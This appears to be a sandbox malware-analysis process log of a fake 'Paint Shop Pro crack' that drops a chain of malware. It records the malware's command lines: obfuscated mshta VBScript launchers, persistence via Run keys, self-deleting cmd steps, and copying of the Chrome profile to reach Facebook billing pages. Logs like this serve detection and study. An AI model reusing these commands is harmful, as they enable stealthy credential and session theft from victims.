C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3524 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8004 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7960 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1352 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7736 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:82⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\tffiwcdC:\Users\Admin\AppData\Roaming\tffiwcd2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\tffiwcd"C:\Users\Admin\AppData\Roaming\tffiwcd"3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd2⤵
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd3⤵
-
C:\Users\Admin\AppData\Roaming\tffiwcdC:\Users\Admin\AppData\Roaming\tffiwcd2⤵
-
C:\Users\Admin\AppData\Roaming\tffiwcd"C:\Users\Admin\AppData\Roaming\tffiwcd"3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~nXV" -F> nul5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "keygen-step-5.exe" -F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exeuQLGv.exe -P5x35C~QWmaAR8osCre6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF ""-P5x35C~QWmaAR8osCre "" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "-P5x35C~QWmaAR8osCre " =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul8⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\2130.tmp.exe"C:\Users\Admin\AppData\Roaming\2130.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\2130.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Executes dropped EXE
- Modifies registry class
- Runs ping.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install5⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5661775.exe"C:\ProgramData\5661775.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\3274620.exe"C:\ProgramData\3274620.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87ef74f50,0x7ff87ef74f60,0x7ff87ef74f706⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1920 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1552 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2360 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2344 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4972 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5384 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2188 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2M6N7.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-2M6N7.tmp\Install.tmp" /SL5="$40372,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-RR25L.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-RR25L.tmp\Ultra.exe" /S /UID=burnerch16⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe"C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-B9A2I.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-B9A2I.tmp\ultramediaburner.tmp" /SL5="$4036E,281924,62464,C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\15-fff3c-1e7-c13b5-9e247f9e88b64\Jaeqefaejisho.exe"C:\Users\Admin\AppData\Local\Temp\15-fff3c-1e7-c13b5-9e247f9e88b64\Jaeqefaejisho.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\d3-54686-f99-ae7bd-451dffab23bbd\Tugaeharuxae.exe"C:\Users\Admin\AppData\Local\Temp\d3-54686-f99-ae7bd-451dffab23bbd\Tugaeharuxae.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exeC:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exeC:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exeC:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exe & exit8⤵
-
